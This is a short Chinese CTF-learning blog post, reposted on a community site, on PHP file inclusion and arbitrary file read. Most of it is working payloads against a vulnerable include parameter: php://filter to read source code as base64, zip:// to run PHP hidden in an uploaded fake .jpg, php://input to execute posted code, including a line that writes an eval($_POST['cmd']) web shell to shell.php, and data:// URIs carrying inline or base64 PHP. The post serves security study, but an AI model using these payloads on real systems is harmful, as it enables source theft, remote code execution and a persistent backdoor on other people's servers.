2021-08-04 CTFer成长之路-任意文件读取漏洞-文件读取漏洞常见读取路径(PHP版)

举报
愚公搬代码 发表于 2021/10/20 00:49:04 2021/10/20
【摘要】 第一步: 利用文件包含漏洞读取文件源码类型如下面: ?fp=php://filter/read=convert.base64-encode/resource=../sqli/db.php 第二步 写入...

第一步:

利用文件包含漏洞读取文件源码类型如下面:
?fp=php://filter/read=convert.base64-encode/resource=../sqli/db.php

第二步
写入文件
?file=zip://D:/soft/phpStudy/WWW/file.jpg%23phpcode.txt

先将要执行的PHP代码写好文件名为phpcode.txt,将phpcode.txt进行zip压缩,压缩文件名为file.zip,如果可以上传zip文件便直接上传,若不能便将file.zip重命名为file.jpg后在上传,其他几种压缩格式也可以这样操作。

由于#在get请求中会将后面的参数忽略所以使用get请求时候应进行url编码为%23,且此处经过测试相对路径是不可行,所以只能用绝对路径。

补充其他重要的协议:php://input

http://127.0.0.1/cmd.php?file=php://input

[POST DATA] <?php phpinfo()?>

也可以POST如下内容生成一句话: <?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"];?>');?>

  
 
  • 1
  • 2
  • 3
  • 4
  • 5

补充其他重要的协议:data://协议
php伪协议中的data通过通配符查找目录下的所有文件

http://127.0.0.1/cmd.php?file=data://text/plain,<?php phpinfo()?>

  
 
  • 1

or

http://127.0.0.1/cmd.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

  
 
  • 1

or

http://127.0.0.1/cmd.php?file=data:text/plain,<?php phpinfo()?>

  
 
  • 1

or

http://127.0.0.1/cmd.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

  
 
  • 1

文章来源: codeboy.blog.csdn.net,作者:愚公搬代码,版权归原作者所有,如需转载,请联系作者。

原文链接:codeboy.blog.csdn.net/article/details/118602761

【版权声明】本文为华为云社区用户转载文章,如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。